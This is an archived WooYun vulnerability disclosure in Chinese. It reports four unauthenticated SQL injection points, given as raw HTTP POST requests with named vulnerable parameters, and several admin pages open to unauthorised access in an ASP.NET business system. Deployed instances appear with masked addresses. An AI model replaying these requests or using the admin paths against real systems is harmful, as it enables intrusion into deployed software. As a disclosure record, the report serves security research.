乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
rt
存在问题:4处SQL注入&系统多处越权(都无需登录)第一处注入:
POST /login.aspx HTTP/1.1Content-Length: 330Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: **.**.**.**:88/Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAUHost: **.**.**.**:88Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*loginSubmit=&ckbIsSave=on&password=g00dPa%24%24w0rD&randomData=&signedData=&txt_verify=g00dPa%24%24w0rD&username=admin&__VIEWSTATE=/wEPDwUKLTg1Mjc0MDQzNmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWNrYklzU2F2ZWvEIdmbjPScY/cv4tJUXwzvI4cqqgA7uf89XFgMLZrY&__VIEWSTATEGENERATOR=C2EE9ABB
参数username第二处注入:
POST /admin/glassmanager.aspx?ModelType=edit&page=1&PID=40 HTTP/1.1Content-Length: 742Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: **.**.**.**:88/Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195Host: **.**.**.**:88Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*btnSearch=%e6%9f%a5%e8%af%a2&hidGrainID=40&txtGlasscode=%e5%8d%95%e9%9d%a2%e6%9c%a8%e6%a0%bc%e4%b8%80%e9%9d%a2%e7%99%bd%e7%8e%bb%e4%b8%80%e9%9d%a2%e5%b8%83%e7%ba%b9&txtGlassCodeForSearch=123&txtGlassName=40&txtGlassNameForSearch=ocljxusc&txtGlassprice=0&__EVENTVALIDATION=/wEdAAnKjHjs2vZ0ShC9zkxI0y4pW4pIN1KIEEsGHukofKCPKC8Au989bZBKED75joowesJSc2ZfrrLnksUmxqYJhYUi/f7hXxuj%2b9RdyEo8/nBf7eFPbBA2nrvZZ4n1DcerbfyIoPAi2xR6UPghNedlm6QFjtTdVzRZn7DFyWrI8V/OY2i3LqZOTKDGsjhJxkmxGp3YmfZmy9iDaVXQJLmwxxmBmae%2bTZLodyGOGWayPROPQQ%3d%3d&__VIEWSTATE=/wEPDwUKLTg4ODI0MDA4MQ9kFgICAw9kFgICAw8PFgIeBFRleHQFBuabtOaWsGRkZKbZg3eBuE8TxE7glDEEswRszq1lBWF0%2bHnGfQYZ%2bfAE&__VIEWSTATEGENERATOR=61268597
参数txtGlassNameForSearch 和 txtGlassCodeForSearch第三处注入:
POST /admin/function/functionmanage.aspx HTTP/1.1Content-Length: 553Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: **.**.**.**:88/Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195Host: **.**.**.**:88Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ButAddFunction=%e6%b7%bb%e5%8a%a0&hidFunctionID=&TextFunctioncode=1&TextFunctionName=qeksviyy&TextFunctionpath=1&__EVENTVALIDATION=/wEdAAYwN3zyZaSJTHn8Ah/SC99I%2bLDo9dAznYnoFSF/78GxrPudp1MFazkgrxYIHSRoS4WM6vkbVh5TFLI8yCGtM2QBufd%2b2kIoS6kOXl%2blwxtK1NN8MV13sGeMpCG0koNNyNDuphDsjuVlO1wXx3SFbjr/Lks0UBPjPRPDSa8BVmo8Cw%3d%3d&__VIEWSTATE=/wEPDwUKLTE0NTk4NzI2MQ9kFgICAw9kFgYCBw8PFgIeB1Zpc2libGVoZGQCCQ8PFgIfAGhkZAINDxYCHgtfIUl0ZW1Db3VudGZkZPipjuIJPjUXAvu9jJCh2U3OEQzJDlv5sIyr/YQ7vkQn&__VIEWSTATEGENERATOR=4F298C76
参数TextFunctioncode第四处注入:
POST /admin/colormanager.aspx?page=2 HTTP/1.1Content-Length: 458Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: **.**.**.**:88/Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195Host: **.**.**.**:88Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*BtnSeasrch=%e6%9f%a5%e8%af%a2&hidGrainID=0&txtCode=1&txtName=imjtmjdm&__EVENTVALIDATION=/wEdAAaOTLJrE1GkP3p9NL%2bgg%2blJozoJZpuXxkpOVJKRbHyuHoVrfPTZCZCdgWOPfArF%2bOv9/uFfG6P71F3ISjz%2bcF/tZRy0t362Wd2hZI98BfBb/2i3LqZOTKDGsjhJxkmxGp2NkRG0i6Gt/nSjTU0ov%2bJK4bHomrKhYXFOuwfglto8CA%3d%3d&__VIEWSTATE=/wEPDwUKMTk4MzU1NTA4NWRkglpP/rm817U8YnqbLrVrtnV9Fpc/WrQXbpNXW35owQM%3d&__VIEWSTATEGENERATOR=C550A4E8
参数txtCode和txtName系统多处越权:
/admin/colormanager.aspx/admin/cad/cadmodelrelation.aspx/admin/cad/cadbaserelationship.aspx/admin/flash/resourcemanager.aspx/admin/flash/scenecatatorymanager2.aspx/admin/flashmanage.aspx不一一举例了。
4处SQL注入:
系统多处越权访问:
案例:
**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx**.**.**.**:8088/login.aspx**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx**.**.**.**:88/login.aspx
联系厂商
未能联系到厂商或者厂商积极拒绝